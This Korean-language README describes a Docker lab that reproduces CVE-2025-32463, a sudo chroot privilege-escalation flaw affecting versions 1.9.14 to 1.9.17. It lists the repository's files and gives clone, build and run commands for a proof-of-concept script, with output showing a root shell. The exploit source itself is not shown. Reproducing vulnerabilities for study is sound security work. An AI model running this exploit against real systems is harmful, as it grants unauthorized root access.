
이 저장소는 sudo의 chroot 기능에서 발생하는 CVE‑2025‑32463 권한 상승 취약점을 시연하기 위한 최소한의 재현 가능한 환경을 제공합니다.
| 파일 | 용도 |
|---|---|
| Dockerfile | 취약한 sudo 1.9.16p2 및 빌드 도구가 포함된 Ubuntu 24.04 이미지를 빌드합니다 |
| sudo‑chwoot.sh | chroot 내부에서 루트 셸을 생성하는 개념 증명(PoC) 익스플로잇 |
| run.sh | (필요한 경우) 이미지를 빌드하고 익스플로잇 컨테이너를 실행하는 도우미 스크립트 |
대부분의 Linux 배포판에서 sudo 1.9.14부터 1.9.17까지(모든 p-리비전)의 취약한 빌드가 영향을 받습니다.
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (drops you into a root shell)
pwn@0da3726bd81f:~$ ./sudo-chwoot.sh
woot!
root@0da3726bd81f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
run.sh는 Docker에 --privileged 및 --rm을 전달하므로, 컨테이너를 종료하면 자동으로 정리됩니다.
작업이 끝나면 이미지를 제거합니다:
docker rmi sudo-chwoot